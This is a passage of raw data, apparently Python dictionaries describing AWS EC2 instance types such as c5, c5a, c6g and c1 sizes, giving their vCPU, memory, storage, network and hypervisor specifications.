'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 4096}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.3, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 4096, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Up to 10 
Gigabit', 'MaximumNetworkInterfaces': 3, 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5a.large', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.3}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 4096}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.3, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 4096, 'TotalSizeInGB': 75, 'Disks': [{'SizeInGB': 75, 'Count': 1, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5ad.large', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 
'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.3}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 4096}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 75, 'Disks': [{'SizeInGB': 75, 'Count': 1, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 4096, 'TotalSizeInGB': 50, 'Disks': [{'SizeInGB': 50, 'Count': 1, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5d.large', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 
4096}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 50, 'Disks': [{'SizeInGB': 50, 'Count': 1, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 5376, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Up to 25 Gigabit', 'MaximumNetworkInterfaces': 3, 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5n.large', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 5376}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 25 Gigabit', 'MaximumNetworkInterfaces': 3, 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': 
{'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 2, 'DefaultCores': 2, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2], 'ValidThreadsPerCore': [1], 'SizeInMiB': 4096, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c6g.large', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 2, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2], 'ValidThreadsPerCore': [1]}, 'MemoryInfo': {'SizeInMiB': 4096}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 2, 'DefaultCores': 2, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2], 'ValidThreadsPerCore': [1], 'SizeInMiB': 4096, 'TotalSizeInGB': 118, 'Disks': [{'SizeInGB': 118, 'Count': 1, 'Type': 
'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c6gd.large', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 2, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2], 'ValidThreadsPerCore': [1]}, 'MemoryInfo': {'SizeInMiB': 4096}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 118, 'Disks': [{'SizeInGB': 118, 'Count': 1, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.8, 'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 7680, 'TotalSizeInGB': 80, 'Disks': [{'SizeInGB': 40, 'Count': 2, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'supported', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'SupportedStrategies': 
['cluster', 'partition', 'spread'], 'InstanceType': 'c3.xlarge', 'CurrentGeneration': False, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs', 'instance-store'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.8}, 'VCpuInfo': {'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 7680}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 80, 'Disks': [{'SizeInGB': 40, 'Count': 2, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'supported', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'unsupported'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.9, 'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 7680, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c4.xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.9}, 'VCpuInfo': 
{'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 7680}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'unsupported'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4, 'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [2], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 8192, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5.xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4}, 'VCpuInfo': {'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [2], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 8192}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 
'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.3, 'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 8192, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5a.xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.3}, 'VCpuInfo': {'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 8192}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.3, 'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 8192, 'TotalSizeInGB': 150, 'Disks': 
[{'SizeInGB': 150, 'Count': 1, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5ad.xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.3}, 'VCpuInfo': {'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 8192}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 150, 'Disks': [{'SizeInGB': 150, 'Count': 1, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4, 'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [2], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 8192, 'TotalSizeInGB': 100, 'Disks': [{'SizeInGB': 100, 'Count': 1, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 
'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5d.xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4}, 'VCpuInfo': {'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [2], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 8192}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 100, 'Disks': [{'SizeInGB': 100, 'Count': 1, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4, 'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [2], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 10752, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Up to 25 Gigabit', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5n.xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 
'SustainedClockSpeedInGhz': 3.4}, 'VCpuInfo': {'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [2], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 10752}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 25 Gigabit', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 4, 'DefaultCores': 4, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2, 3, 4], 'ValidThreadsPerCore': [1], 'SizeInMiB': 8192, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c6g.xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 4, 'DefaultCores': 4, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2, 3, 4], 'ValidThreadsPerCore': [1]}, 'MemoryInfo': {'SizeInMiB': 8192}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 
'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 4, 'DefaultCores': 4, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2, 3, 4], 'ValidThreadsPerCore': [1], 'SizeInMiB': 8192, 'TotalSizeInGB': 237, 'Disks': [{'SizeInGB': 237, 'Count': 1, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c6gd.xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 4, 'DefaultCores': 4, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2, 3, 4], 'ValidThreadsPerCore': [1]}, 'MemoryInfo': {'SizeInMiB': 8192}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 237, 'Disks': [{'SizeInGB': 237, 'Count': 1, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 
'AutoRecoverySupported': False}, {'SupportedArchitectures': ['x86_64'], 'DefaultVCpus': 8, 'DefaultCores': 8, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8], 'ValidThreadsPerCore': [1], 'SizeInMiB': 7168, 'TotalSizeInGB': 1680, 'Disks': [{'SizeInGB': 420, 'Count': 4, 'Type': 'hdd'}], 'EbsOptimizedSupport': 'supported', 'EncryptionSupport': 'unsupported', 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 0, 'Ipv6Supported': False, 'EnaSupport': 'unsupported', 'SupportedStrategies': ['partition', 'spread'], 'InstanceType': 'c1.xlarge', 'CurrentGeneration': False, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs', 'instance-store'], 'BareMetal': False, 'Hypervisor': 